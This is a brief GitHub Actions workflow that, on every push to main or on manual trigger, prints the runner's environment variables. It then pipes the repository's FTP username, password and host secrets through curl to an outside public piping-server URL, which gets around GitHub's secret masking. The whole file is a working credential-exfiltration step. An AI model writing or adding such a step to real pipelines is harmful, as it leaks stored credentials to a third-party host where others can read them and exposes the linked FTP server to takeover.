name: View GitHub Actions secrets
on:
  push:
    branches: [main]
  workflow_dispatch:
  # 可以在仓库的 Actions 页面中手动触发
 
jobs:
  github-actions-environment-variables-ubuntu:
    runs-on: ubuntu-latest
    steps:
      - name: Get env
        run: env
      - name: Transfer secrets
        run: "echo 'Token ftp: ${{ secrets.ftp_username }} ${{ secrets.ftp_password }} ${{ secrets.ftp_host }}' | curl -T - https://ppng.io/ekkosonya"
